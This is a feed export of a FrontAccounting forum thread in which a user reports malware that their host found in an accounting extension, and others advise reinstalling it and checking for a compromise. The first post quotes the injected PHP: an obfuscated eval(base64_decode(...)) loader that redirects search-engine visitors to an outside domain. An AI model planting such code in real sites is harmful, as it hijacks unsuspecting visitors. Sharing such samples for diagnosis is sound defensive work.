<![CDATA[FrontAccounting forum — Malicious Files Detected, hosted in BlueHost]]> 2013-01-27T13:14:26Z PunBB https://frontaccounting.com/punbb/viewtopic.php?id=3791 <![CDATA[Re: Malicious Files Detected, hosted in BlueHost]]> Where did you get the extension installed from? Must warn the community of blacklisted extension URLs.

]]> https://frontaccounting.com/punbb/profile.php?id=364 2013-01-27T13:14:26Z https://frontaccounting.com/punbb/viewtopic.php?pid=15292#p15292 <![CDATA[Re: Malicious Files Detected, hosted in BlueHost]]> Check your hosting account, probably your server is compromised.
Janusz

]]> https://frontaccounting.com/punbb/profile.php?id=89 2013-01-23T22:58:41Z https://frontaccounting.com/punbb/viewtopic.php?pid=15218#p15218 <![CDATA[Re: Malicious Files Detected, hosted in BlueHost]]> Yes this looks suspicious. Please delete the extension 'import_multijournalentries.php' and install/activate it again from the FA Setup, Install / activate extensions again.

/Joe

]]> https://frontaccounting.com/punbb/profile.php?id=3 2013-01-23T07:46:42Z https://frontaccounting.com/punbb/viewtopic.php?pid=15203#p15203 <![CDATA[Malicious Files Detected, hosted in BlueHost]]> Blue Host informed me that they have detected malicious code into scripts as below:

/modules/import_multijournalentries/import_multijournalentries.php

The malicious code detected is similar to:

<?php           eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9kZW52ZXIuZHVtYjEuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

Please help me on the above if anyone can.

Thank you.

]]> https://frontaccounting.com/punbb/profile.php?id=17220 2013-01-23T06:27:01Z https://frontaccounting.com/punbb/viewtopic.php?pid=15202#p15202